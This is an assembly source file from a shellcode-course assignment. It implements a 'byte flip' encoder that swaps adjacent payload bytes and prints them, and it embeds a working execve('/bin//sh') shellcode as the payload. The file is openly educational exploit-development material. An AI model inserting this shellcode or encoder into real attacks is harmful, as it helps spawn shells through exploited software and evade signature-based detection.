SLAE Assignment #4 Custom Byte Flip Encoder
; Filename: assignment4-encoder.nasm
; Student ID: SLAE - 895
;
; Purpose: Assignment #4 Custom Byte Flip Encoder — swaps each adjacent pair
;          of payload bytes in place and prints the result as "0x..," bytes.
; Target:  32-bit x86 Linux, NASM (Intel) syntax; links against libc for
;          printf/exit using the cdecl convention (caller pops arguments).
;          The .shellcode section is deliberately RWX because the encoder
;          rewrites the payload buffer that sits inline with the code; this
;          file is the host-side encoding tool, not the payload that ships.
; Note:    0x99 is the end-of-payload sentinel, so the payload itself must
;          not contain 0x99.  Build presumably as
;          `nasm -f elf32 assignment4-encoder.nasm && gcc -m32 -no-pie ...`
;          (the absolute `push FormatOutput` needs a non-PIE link) — confirm.
extern printf
extern exit
global main
section .text
; int main(void) — entry point handed to us by the C runtime (linked with libc).
; Control never returns here: the jump starts the JMP-CALL-POP sequence
; (main -> call_shellcode -> encoder) and the program ends via `call exit`
; at exit_code.  The frame crt0 built for main is simply abandoned.
main:
jmp long call_shellcode ; Step 1 of JMP-CALL-POP: the `call encoder` at call_shellcode pushes &Shellcode as its return address
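section .shellcode progbits alloc exec write align=16
; This section is RWX on purpose: the JMP-CALL-POP trick places `Shellcode`
; right after the `call encoder`, and the encoder rewrites that buffer in
; place, so the same section has to be executable (code) and writable (data).
; Nothing here is the payload that gets delivered; it is the host-side
; encoding tool, so W^X is relaxed in this one section only.

SENTINEL equ 0x99                       ; end-of-payload marker; must match the 0x99 bytes in Shellcode

;-----------------------------------------------------------------------
; encoder — pair-swap ("byte flip") the bytes of `Shellcode` in place,
;           then print the result as a "0x..," byte list via printf.
; Target:  32-bit x86 Linux, NASM syntax, cdecl calls into libc.
; Entry:   reached only via `call encoder` at call_shellcode, so the word
;          on top of the stack is the address of `Shellcode`.
; Layout:  Shellcode = SENTINEL, <payload>, SENTINEL, SENTINEL
;          The leading sentinel shifts the payload by one, so moving every
;          even-index byte two slots down yields (S[1],S[0]),(S[3],S[2]),…
;          i.e. each adjacent pair of the payload swapped.  Two trailing
;          sentinels guarantee the even-index scan meets one whether the
;          payload length is even or odd.
; Caveats: - SENTINEL is the only loop bound, so the payload MUST NOT
;            contain 0x99 and the terminator must be present; otherwise the
;            scan runs off the end of the buffer.
;          - For an odd-length payload the last even slot keeps its stale
;            byte (0xcd with the payload below) because the loop stops as
;            soon as it reads a sentinel; that byte lands after the last
;            swapped pair and is printed, but a pair-swapping decoder puts
;            it after the final instruction, so it is never executed.
;          - printf always gets the fixed literal FormatOutput as its format
;            and the byte as an int argument, never payload bytes as format.
; Regs:    esi = base of Shellcode (callee-saved, survives printf)
;          edi = write cursor during the encode pass
;          eax = read index (encode pass) / current byte (print pass)
;          ebx = read index during the print pass (callee-saved)
;          edx = scratch byte during the encode pass
; Exit:    falls through into printcode and leaves via `je exit_code`
;          (defined after the data); it never returns to its caller.
; Fixes vs. original: cdecl stack cleanup after printf (the old loop leaked
;          8 bytes of stack per byte printed), full-width index arithmetic
;          (`add al,2` / `add bl,1` wrapped past 255 bytes of payload), and
;          the byte is zero-extended before being pushed as an int.
;-----------------------------------------------------------------------
encoder:
        pop     esi                     ; esi = &Shellcode (return address of `call encoder`)
        mov     edi, esi                ; write cursor starts at Shellcode[0]
        mov     eax, 2                  ; read index starts at Shellcode[2]

; encode pass: Shellcode[i-2] = Shellcode[i] for i = 2, 4, 6, … until SENTINEL
encode:
        mov     dl, byte [esi + eax]    ; dl = Shellcode[i]
        cmp     dl, SENTINEL
        je      short init_reg          ; sentinel reached: encode pass done
        mov     byte [edi], dl          ; drop the byte two slots earlier
        add     eax, 2                  ; full-width: no wrap for payloads > 254 bytes
        add     edi, 2
        jmp     short encode

; print pass: printf("0x%hhx,", Shellcode[j]) for j = 0, 1, … until SENTINEL
init_reg:
        xor     ebx, ebx                ; ebx = print index; callee-saved so printf keeps it
printcode:
        movzx   eax, byte [esi + ebx]   ; zero-extend so the pushed int is just this byte
        cmp     al, SENTINEL
        je      short exit_code         ; sentinel reached: print newline and exit
        inc     ebx
        push    eax                     ; int argument consumed by %hhx
        push    FormatOutput            ; fixed format string (absolute address: non-PIE build)
        call    printf
        add     esp, 8                  ; cdecl: the caller removes both arguments
        jmp     short printcode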
; JMP-CALL-POP anchor.  `call encoder` pushes the address of the byte that
; follows it — i.e. `Shellcode` — as its return address, which encoder pops
; into esi.  Everything after the call is data and is never executed.
call_shellcode: ; Layout below: 0x99 | original payload | 0x99, 0x99
call encoder
; Shellcode layout: 0x99 | payload | 0x99, 0x99
;   - the leading 0x99 offsets the payload by one so that encoder's
;     "move every even-index byte two slots down" becomes a pair swap;
;     it is overwritten by the first moved byte;
;   - the two trailing 0x99 bytes are the sentinel (one of them sits at an
;     even index whichever parity the payload has), so 0x99 must not occur
;     inside the payload itself.
; Payload (23 bytes) decodes to the classic execve("/bin//sh") stub:
;   xor eax,eax / push eax / push "//sh" / push "/bin" / mov ebx,esp /
;   push eax / push ebx / mov ecx,esp / mov al,11 / int 0x80
Shellcode: db 0x99, 0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80, 0x99,0x99
FormatOutput: db "0x%hhx,", 0 ; printf format for one byte: "0x<hex>,"; %hhx prints only the low byte of the pushed int
new_line: db "",10,0 ; "\n" printed once at exit_code to end the byte list
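;-----------------------------------------------------------------------
; exit_code — terminate the printed byte list with "\n" and exit(0).
; Reached from printcode once the 0x99 sentinel is read; esi/edi/ebx are
; dead here.  Never returns.
; Fix vs. original: `call exit` used to take whatever was on top of the
; stack — the address of new_line left behind by `push new_line` — as its
; status argument, so the process exit code was the low byte of a pointer
; instead of 0.  The null byte in `push dword 0` is fine: this is the
; host-side tool, not the payload.
;-----------------------------------------------------------------------
exit_code:
        push    new_line
        call    printf
        add     esp, 4                  ; cdecl: caller removes printf's argument
        push    dword 0                 ; exit(0)
        call    exit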